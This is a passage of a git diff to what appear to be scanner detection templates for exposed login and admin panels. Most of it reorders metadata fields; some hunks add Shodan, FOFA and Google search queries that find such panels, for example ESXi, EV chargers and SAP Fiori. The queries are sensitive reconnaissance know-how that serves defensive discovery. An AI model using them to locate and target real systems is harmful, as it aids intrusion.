CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"DPLUS Dashboard" - verified: true tags: panel,dplus,exposure http: diff --git a/http/exposed-panels/dqs-superadmin-panel.yaml b/http/exposed-panels/dqs-superadmin-panel.yaml index 74f5cf2875..3bd88835ba 100644 --- a/http/exposed-panels/dqs-superadmin-panel.yaml +++ b/http/exposed-panels/dqs-superadmin-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"DQS Superadmin" - verified: true tags: panel,dqs,superadmin http: diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index 9ec2e9828b..248031199c 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Dradis Professional Edition" - verified: true tags: panel,dradis http: diff --git a/http/exposed-panels/drawio-flowchartmaker-panel.yaml b/http/exposed-panels/drawio-flowchartmaker-panel.yaml index a0826f7469..c134a3ce4a 100644 --- a/http/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/http/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: drawio - shodan-query: http.title:"Flowchart Maker" - vendor: diagrams verified: true + max-request: 1 + vendor: diagrams + product: drawio + shodan-query: + - http.title:"Flowchart Maker" + - http.title:"flowchart maker" + fofa-query: title="flowchart maker" + google-query: intitle:"flowchart maker" tags: panel,drawio,oss,diagrams http: diff --git a/http/exposed-panels/druid-console-exposure.yaml b/http/exposed-panels/druid-console-exposure.yaml index 4ba687a5c0..4944c7aa81 100644 --- a/http/exposed-panels/druid-console-exposure.yaml +++ b/http/exposed-panels/druid-console-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:alibaba:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: druid vendor: alibaba + product: druid tags: panel,alibaba,druid http: diff --git a/http/exposed-panels/druid-panel.yaml b/http/exposed-panels/druid-panel.yaml index 4ccebd1fca..7a90ead3e4 100644 --- a/http/exposed-panels/druid-panel.yaml +++ b/http/exposed-panels/druid-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: druid vendor: apache + product: druid tags: panel,druid,apache http: diff --git a/http/exposed-panels/drupal-login.yaml b/http/exposed-panels/drupal-login.yaml index 265533e4a6..eaf5291efe 100644 --- a/http/exposed-panels/drupal-login.yaml +++ b/http/exposed-panels/drupal-login.yaml @@ -11,9 +11,11 @@ info: cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: drupal - shodan-query: http.component:"drupal" vendor: drupal + product: drupal + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: panel,drupal http: diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index aaf6781ecb..7caaad0caa 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.dedalus.com/fr/wp-content/uploads/sites/13/2022/05/Catalogue-formations-DxCare-2022.pdf metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,dxplanning,login,detect http: diff --git a/http/exposed-panels/dynatrace-panel.yaml b/http/exposed-panels/dynatrace-panel.yaml index f22700791f..1727044122 100644 --- a/http/exposed-panels/dynatrace-panel.yaml +++ b/http/exposed-panels/dynatrace-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1828614783 - verified: true tags: dynatrace,login,panel http: diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index 78fd8a55e3..966964e4a8 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -11,12 +11,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:dzzoffice:dzzoffice:*:*:*:*:*:*:*:* metadata: - fofa-query: title="dzzoffice" + verified: true max-request: 1 + vendor: dzzoffice product: dzzoffice shodan-query: http.favicon.hash:-1961736892 - vendor: dzzoffice - verified: true + fofa-query: + - title="dzzoffice" + - icon_hash=-1961736892 tags: panel,dzzoffice,install http: diff --git a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml index b43211cc4a..58da9e2810 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -9,9 +9,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.favicon.hash:-1961736892 - verified: true + product: dzzoffice + vendor: dzzoffice + fofa-query: + - title="dzzoffice" + - icon_hash=-1961736892 tags: dzzoffice,panel http: diff --git a/http/exposed-panels/e-mobile-panel.yaml b/http/exposed-panels/e-mobile-panel.yaml index a8478f1f9e..6d2d6f80cc 100644 --- a/http/exposed-panels/e-mobile-panel.yaml +++ b/http/exposed-panels/e-mobile-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"E-Mobile " - verified: true tags: panel,e-mobile http: diff --git a/http/exposed-panels/eMerge-panel.yaml b/http/exposed-panels/eMerge-panel.yaml index 5fe66b3470..0be5836a6c 100644 --- a/http/exposed-panels/eMerge-panel.yaml +++ b/http/exposed-panels/eMerge-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: linear_emerge_essential_firmware - shodan-query: http.title:"eMerge" - vendor: nortekcontrol verified: true + max-request: 1 + vendor: nortekcontrol + product: linear_emerge_essential_firmware + shodan-query: + - http.title:"eMerge" + - http.title:"emerge" + fofa-query: title="emerge" + google-query: intitle:"emerge" tags: panel,emerge,nortek,nortekcontrol http: diff --git a/http/exposed-panels/earcu-panel.yaml b/http/exposed-panels/earcu-panel.yaml index 6b052bed06..0190ef18de 100644 --- a/http/exposed-panels/earcu-panel.yaml +++ b/http/exposed-panels/earcu-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.earcu.com/products metadata: + verified: "true" max-request: 1 shodan-query: html:'content="eArcu' - verified: "true" tags: panel,earcu,detect http: diff --git a/http/exposed-panels/easyjob-panel.yaml b/http/exposed-panels/easyjob-panel.yaml index 37bf2e096b..02d9c08d2a 100644 --- a/http/exposed-panels/easyjob-panel.yaml +++ b/http/exposed-panels/easyjob-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.en.because-software.com/software/easyjob/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Log in - easyJOB" - verified: true tags: panel,easyjob,login http: diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml index 7429e53e96..5dd53b1e1e 100644 --- a/http/exposed-panels/easyvista-panel.yaml +++ b/http/exposed-panels/easyvista-panel.yaml @@ -1,19 +1,19 @@ id: easyvista-panel -info: - name: EasyVista Login Panel - Detect - author: righettod - severity: info - description: | - EasyVista login panel was detected. - reference: - - https://www.easyvista.com/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"Easyvista" - tags: panel,easyvista,login,detect - +info: + name: EasyVista Login Panel - Detect + author: righettod + severity: info + description: | + EasyVista login panel was detected. + reference: + - https://www.easyvista.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Easyvista" + tags: panel,easyvista,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/eclipse-birt-panel.yaml b/http/exposed-panels/eclipse-birt-panel.yaml index 8586bce1e6..8663563562 100644 --- a/http/exposed-panels/eclipse-birt-panel.yaml +++ b/http/exposed-panels/eclipse-birt-panel.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Eclipse BIRT Home" + verified: true max-request: 2 shodan-query: title:"Eclipse BIRT Home" - verified: true + google-query: intitle:"Eclipse BIRT Home" tags: panel,eclipsebirt,detect http: diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index 1fd6c668f9..e6d807d9f4 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:o:ui:edgeos:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: edgeos vendor: ui + product: edgeos tags: login,tech,edgeos,edgemax,panel,ui http: diff --git a/http/exposed-panels/efak-login-panel.yaml b/http/exposed-panels/efak-login-panel.yaml index 3a03a2f5b8..d36186bfed 100644 --- a/http/exposed-panels/efak-login-panel.yaml +++ b/http/exposed-panels/efak-login-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/smartloli/efak - https://www.kafka-eagle.org/ metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:1693580324 - verified: true tags: panel,efak,login,detect http: diff --git a/http/exposed-panels/eko-management-console-login.yaml b/http/exposed-panels/eko-management-console-login.yaml index 3a97680038..f6824f19a1 100644 --- a/http/exposed-panels/eko-management-console-login.yaml +++ b/http/exposed-panels/eko-management-console-login.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Charger Management Console" + verified: true max-request: 1 shodan-query: http.title:"Charger Management Console" - verified: true + google-query: intitle:"Charger Management Console" tags: panel,eko http: diff --git a/http/exposed-panels/eko-software-update-panel.yaml b/http/exposed-panels/eko-software-update-panel.yaml index d749fced04..d07a8e776e 100644 --- a/http/exposed-panels/eko-software-update-panel.yaml +++ b/http/exposed-panels/eko-software-update-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" max-request: 1 shodan-query: http.title:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" + google-query: intitle:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" tags: panel,eko http: diff --git a/http/exposed-panels/elemiz-network-manager.yaml b/http/exposed-panels/elemiz-network-manager.yaml index c2d4b796b0..77831f8192 100644 --- a/http/exposed-panels/elemiz-network-manager.yaml +++ b/http/exposed-panels/elemiz-network-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Elemiz Network Manager" - verified: true tags: elemiz,manager,login,panel http: diff --git a/http/exposed-panels/emby-panel.yaml b/http/exposed-panels/emby-panel.yaml index 59824ba5be..692abf556c 100644 --- a/http/exposed-panels/emby-panel.yaml +++ b/http/exposed-panels/emby-panel.yaml @@ -14,11 +14,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: emby product: emby shodan-query: http.title:"emby" - vendor: emby - verified: true + fofa-query: title="emby" + google-query: intitle:"emby" tags: panel,emby,oss http: diff --git a/http/exposed-panels/emessage-panel.yaml b/http/exposed-panels/emessage-panel.yaml index 4680f3580a..7c4e6fbe80 100644 --- a/http/exposed-panels/emessage-panel.yaml +++ b/http/exposed-panels/emessage-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="emessage" max-request: 1 + fofa-query: title="emessage" tags: panel,emessage http: diff --git a/http/exposed-panels/emqx-panel.yaml b/http/exposed-panels/emqx-panel.yaml index 28e4a61fa6..8ef86df187 100644 --- a/http/exposed-panels/emqx-panel.yaml +++ b/http/exposed-panels/emqx-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.emqx.io/ metadata: + verified: true max-request: 1 shodan-query: http.title:"EMQX Dashboard" - verified: true tags: panel,emqx,login,detect http: diff --git a/http/exposed-panels/ems-webclient-panel.yaml b/http/exposed-panels/ems-webclient-panel.yaml index 03f94ee5ac..5e819fc243 100644 --- a/http/exposed-panels/ems-webclient-panel.yaml +++ b/http/exposed-panels/ems-webclient-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: inurl:EMSWebClient/ max-request: 2 + google-query: inurl:EMSWebClient/ tags: panel,ems http: diff --git a/http/exposed-panels/eos-http-browser.yaml b/http/exposed-panels/eos-http-browser.yaml index 15abd0d391..9a8382515c 100644 --- a/http/exposed-panels/eos-http-browser.yaml +++ b/http/exposed-panels/eos-http-browser.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=634930085344181&set=pcb.634929508677572 metadata: + verified: true max-request: 2 shodan-query: title:"EOS HTTP Browser" - verified: true tags: exposure,eos,httpbrowser,panel http: diff --git a/http/exposed-panels/episerver-panel.yaml b/http/exposed-panels/episerver-panel.yaml index 430b0ac630..515a4aa64a 100644 --- a/http/exposed-panels/episerver-panel.yaml +++ b/http/exposed-panels/episerver-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"epihash" - verified: true tags: panel,optimizely,episerver http: diff --git a/http/exposed-panels/epson-projector-detect.yaml b/http/exposed-panels/epson-projector-detect.yaml index 70a2535b5d..5ef76ee09e 100644 --- a/http/exposed-panels/epson-projector-detect.yaml +++ b/http/exposed-panels/epson-projector-detect.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: cgi-bin/webconf.exe max-request: 1 + fofa-query: cgi-bin/webconf.exe tags: iot,projector,panel,unauth,epson http: diff --git a/http/exposed-panels/eset-protect-panel.yaml b/http/exposed-panels/eset-protect-panel.yaml index f72761ffe7..45a3abe42d 100644 --- a/http/exposed-panels/eset-protect-panel.yaml +++ b/http/exposed-panels/eset-protect-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:751911084 - verified: true tags: login,eset,panel,detect http: diff --git a/http/exposed-panels/esphome-panel.yaml b/http/exposed-panels/esphome-panel.yaml index 351cee5200..6f216bb625 100644 --- a/http/exposed-panels/esphome-panel.yaml +++ b/http/exposed-panels/esphome-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:esphome:esphome:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: esphome - shodan-query: title:"Login - ESPHome" - vendor: esphome verified: true + max-request: 1 + vendor: esphome + product: esphome + shodan-query: + - title:"Login - ESPHome" + - http.title:"login - esphome" + fofa-query: title="login - esphome" + google-query: intitle:"login - esphome" tags: panel,esphome,iot http: diff --git a/http/exposed-panels/esxi-system.yaml b/http/exposed-panels/esxi-system.yaml index 904b79daa0..9737b4acc6 100644 --- a/http/exposed-panels/esxi-system.yaml +++ b/http/exposed-panels/esxi-system.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:vmware:esxi:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: esxi - shodan-query: html:"esxUiApp" vendor: vmware + product: esxi + shodan-query: + - html:"esxUiApp" + - http.html:"esxuiapp" + - cpe:"cpe:2.3:o:vmware:esxi" + fofa-query: body="esxuiapp" tags: panel,esxi,vmware http: diff --git a/http/exposed-panels/eventum-panel.yaml b/http/exposed-panels/eventum-panel.yaml index 44a44b21c8..27a9519d91 100644 --- a/http/exposed-panels/eventum-panel.yaml +++ b/http/exposed-panels/eventum-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mysql:eventum:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: mysql product: eventum shodan-query: http.favicon.hash:305412257 - vendor: mysql - verified: true + fofa-query: icon_hash=305412257 tags: panel,eventum,mysql http: diff --git a/http/exposed-panels/evlink/evlink-panel.yaml b/http/exposed-panels/evlink/evlink-panel.yaml index 512e4081a8..61399164c6 100644 --- a/http/exposed-panels/evlink/evlink-panel.yaml +++ b/http/exposed-panels/evlink/evlink-panel.yaml @@ -5,10 +5,10 @@ info: author: ritikchaddha severity: info metadata: - fofa-query: title="EVlink Local Controller" + verified: true max-request: 1 shodan-query: title:"EVlink Local Controller" - verified: true + fofa-query: title="EVlink Local Controller" tags: panel,evlink,login,detect http: diff --git a/http/exposed-panels/evlink/evse-web-panel.yaml b/http/exposed-panels/evlink/evse-web-panel.yaml index 0bff8e7844..f9647a3013 100644 --- a/http/exposed-panels/evlink/evse-web-panel.yaml +++ b/http/exposed-panels/evlink/evse-web-panel.yaml @@ -7,12 +7,17 @@ info: classification: cpe: cpe:2.3:o:schneider-electric:evlink_charging_station_firmware:*:*:*:*:*:*:*:* metadata: - fofa-query: title="EVSE Web Interface" - max-request: 2 - product: evlink_charging_station_firmware - shodan-query: title:"EVSE Web Interface" - vendor: schneider-electric verified: true + max-request: 2 + vendor: schneider-electric + product: evlink_charging_station_firmware + shodan-query: + - title:"EVSE Web Interface" + - http.title:"evse web interface" + fofa-query: + - title="EVSE Web Interface" + - title="evse web interface" + google-query: intitle:"evse web interface" tags: panel,evlink,evse,login,detect,schneider-electric http: diff --git a/http/exposed-panels/ewm-manager-panel.yaml b/http/exposed-panels/ewm-manager-panel.yaml index 2f22bacf8f..31c146ca47 100644 --- a/http/exposed-panels/ewm-manager-panel.yaml +++ b/http/exposed-panels/ewm-manager-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"EWM Manager" - verified: true tags: ewm,manager,login,panel http: diff --git a/http/exposed-panels/exagrid-manager-panel.yaml b/http/exposed-panels/exagrid-manager-panel.yaml index eee45891d4..8293e5702a 100644 --- a/http/exposed-panels/exagrid-manager-panel.yaml +++ b/http/exposed-panels/exagrid-manager-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:exagrid:backup_appliance:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: backup_appliance - shodan-query: title:"ExaGrid Manager" - vendor: exagrid verified: true + max-request: 1 + vendor: exagrid + product: backup_appliance + shodan-query: + - title:"ExaGrid Manager" + - http.title:"exagrid manager" + fofa-query: title="exagrid manager" + google-query: intitle:"exagrid manager" tags: exagrid,manager,login,panel http: diff --git a/http/exposed-panels/exolis-engage-panel.yaml b/http/exposed-panels/exolis-engage-panel.yaml index c1f4f07e00..19e2b18260 100644 --- a/http/exposed-panels/exolis-engage-panel.yaml +++ b/http/exposed-panels/exolis-engage-panel.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"engage - Portail soignant" + verified: true max-request: 1 shodan-query: html:"engage - Portail soignant" - verified: true + google-query: intitle:"engage - Portail soignant" tags: panel,exolis,engage http: diff --git a/http/exposed-panels/exposed-webalizer.yaml b/http/exposed-panels/exposed-webalizer.yaml index 4003614fe6..b05b203bc7 100644 --- a/http/exposed-panels/exposed-webalizer.yaml +++ b/http/exposed-panels/exposed-webalizer.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intext:"webalizer" intext:"Usage Statistics for" - max-request: 1 verified: true + max-request: 1 + google-query: intext:"webalizer" intext:"Usage Statistics for" tags: panel,webalizer,edb http: diff --git a/http/exposed-panels/extron-cms-panel.yaml b/http/exposed-panels/extron-cms-panel.yaml index b0beafeb6f..2793b1e979 100644 --- a/http/exposed-panels/extron-cms-panel.yaml +++ b/http/exposed-panels/extron-cms-panel.yaml @@ -10,12 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ektron:ektron_content_management_system:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Ektron-CMS" - max-request: 1 - product: ektron_content_management_system - shodan-query: http.html:"Ektron" - vendor: ektron verified: true + max-request: 1 + vendor: ektron + product: ektron_content_management_system + shodan-query: + - http.html:"Ektron" + - http.html:"ektron" + - cpe:"cpe:2.3:a:ektron:ektron_content_management_system" + fofa-query: + - app="Ektron-CMS" + - app="ektron-cms" + - body="ektron" tags: panel,ektron,cms http: diff --git a/http/exposed-panels/ez-publish-panel.yaml b/http/exposed-panels/ez-publish-panel.yaml index 6c21e598ec..ad22492a34 100644 --- a/http/exposed-panels/ez-publish-panel.yaml +++ b/http/exposed-panels/ez-publish-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"eZ Publish" - verified: true tags: panel,ez http: diff --git a/http/exposed-panels/f-secure-policy-manager.yaml b/http/exposed-panels/f-secure-policy-manager.yaml index b0084a5eab..6ae7ac46be 100644 --- a/http/exposed-panels/f-secure-policy-manager.yaml +++ b/http/exposed-panels/f-secure-policy-manager.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:withsecure:f-secure_policy_manager:*:*:*:*:windows:*:*:* metadata: max-request: 1 - product: f-secure_policy_manager - shodan-query: http.title:"F-Secure Policy Manager Server" vendor: withsecure + product: f-secure_policy_manager + shodan-query: + - http.title:"F-Secure Policy Manager Server" + - http.title:"f-secure policy manager server" + fofa-query: title="f-secure policy manager server" + google-query: intitle:"f-secure policy manager server" tags: login,panel,withsecure http: diff --git a/http/exposed-panels/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml index 9a465fae78..7bc09c4cf4 100644 --- a/http/exposed-panels/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -7,8 +7,8 @@ info: description: | Detects F5 Admin Interfaces. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"BIG-IP Configuration Utility" tags: f5,admin,detect,panel,login diff --git a/http/exposed-panels/fastpanel-hosting-control-panel.yaml b/http/exposed-panels/fastpanel-hosting-control-panel.yaml index 988de7f31e..9ab7a7a91b 100644 --- a/http/exposed-panels/fastpanel-hosting-control-panel.yaml +++ b/http/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"FASTPANEL HOSTING CONTROL" - verified: true tags: panel,fastpanel http: diff --git a/http/exposed-panels/filebrowser-login-panel.yaml b/http/exposed-panels/filebrowser-login-panel.yaml index 661e69c2d7..2cb717044b 100644 --- a/http/exposed-panels/filebrowser-login-panel.yaml +++ b/http/exposed-panels/filebrowser-login-panel.yaml @@ -9,11 +9,12 @@ info: classification: cpe: cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 3 + vendor: filebrowser product: filebrowser shodan-query: http.favicon.hash:1052926265 - vendor: filebrowser - verified: true + fofa-query: icon_hash=1052926265 tags: panel,filebrowser,detect http: diff --git a/http/exposed-panels/fiori-launchpad.yaml b/http/exposed-panels/fiori-launchpad.yaml index 6d1be7c276..5db3401aa6 100644 --- a/http/exposed-panels/fiori-launchpad.yaml +++ b/http/exposed-panels/fiori-launchpad.yaml @@ -12,11 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sap:fiori_launchpad:*:*:*:*:*:*:*:* metadata: - google-query: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com - max-request: 1 - product: fiori_launchpad - vendor: sap verified: true + max-request: 1 + vendor: sap + product: fiori_launchpad + google-query: + - sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com + - sap/bc/ui5_ui5/ui2/ushell/shells/abap/fiorilaunchpad.html -site:sap.com tags: sap,fiori,edb,panel http: diff --git a/http/exposed-panels/fiorilaunchpad-logon.yaml b/http/exposed-panels/fiorilaunchpad-logon.yaml index 505d9a61fa..7071ecc9a7 100644 --- a/http/exposed-panels/fiorilaunchpad-logon.yaml +++ b/http/exposed-panels/fiorilaunchpad-logon.yaml @@ -13,8 +13,9 @@ info: cpe: cpe:2.3:a:sap:fiori_launchpad:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fiori_launchpad vendor: sap + product: fiori_launchpad + google-query: sap/bc/ui5_ui5/ui2/ushell/shells/abap/fiorilaunchpad.html -site:sap.com tags: panel,edb,sap http: diff --git a/http/exposed-panels/fireware-xtm-user-authentication.yaml b/http/exposed-panels/fireware-xtm-user-authentication.yaml index 59638c3d4c..e17dffed2d 100644 --- a/http/exposed-panels/fireware-xtm-user-authentication.yaml +++ b/http/exposed-panels/fireware-xtm-user-authentication.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:watchguard:fireware_xtm:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fireware_xtm - shodan-query: http.title:"Fireware XTM User Authentication" vendor: watchguard + product: fireware_xtm + shodan-query: + - http.title:"Fireware XTM User Authentication" + - http.title:"fireware xtm user authentication" + fofa-query: title="fireware xtm user authentication" + google-query: intitle:"fireware xtm user authentication" tags: panel,watchguard http: diff --git a/http/exposed-panels/flahscookie-superadmin-panel.yaml b/http/exposed-panels/flahscookie-superadmin-panel.yaml index f2e6e1cad3..d70f473f0c 100644 --- a/http/exposed-panels/flahscookie-superadmin-panel.yaml +++ b/http/exposed-panels/flahscookie-superadmin-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Flahscookie Superadmin" - verified: true tags: panel,flahscookie,superadmin http: diff --git a/http/exposed-panels/flink-exposure.yaml b/http/exposed-panels/flink-exposure.yaml index 5f85667f29..21f2603f95 100644 --- a/http/exposed-panels/flink-exposure.yaml +++ b/http/exposed-panels/flink-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: flink vendor: apache + product: flink tags: panel,apache,flink http: diff --git a/http/exposed-panels/flip-cms-panel.yaml b/http/exposed-panels/flip-cms-panel.yaml index 82d3a8adf5..19cf41e6c8 100644 --- a/http/exposed-panels/flip-cms-panel.yaml +++ b/http/exposed-panels/flip-cms-panel.yaml @@ -12,8 +12,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,flip,cms http: diff --git a/http/exposed-panels/flureedb-admin-console.yaml b/http/exposed-panels/flureedb-admin-console.yaml index 2c3dd935c2..aa7c7d8ed3 100644 --- a/http/exposed-panels/flureedb-admin-console.yaml +++ b/http/exposed-panels/flureedb-admin-console.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"FlureeDB Admin Console" - verified: true tags: panel,flureedb http: diff --git a/http/exposed-panels/footprints-panel.yaml b/http/exposed-panels/footprints-panel.yaml index 1e6d23d686..6fd3e55d3e 100644 --- a/http/exposed-panels/footprints-panel.yaml +++ b/http/exposed-panels/footprints-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"FootPrints Service Core Login" - verified: true tags: tech,panel,footprints http: diff --git a/http/exposed-panels/forcepoint.yaml b/http/exposed-panels/forcepoint.yaml index 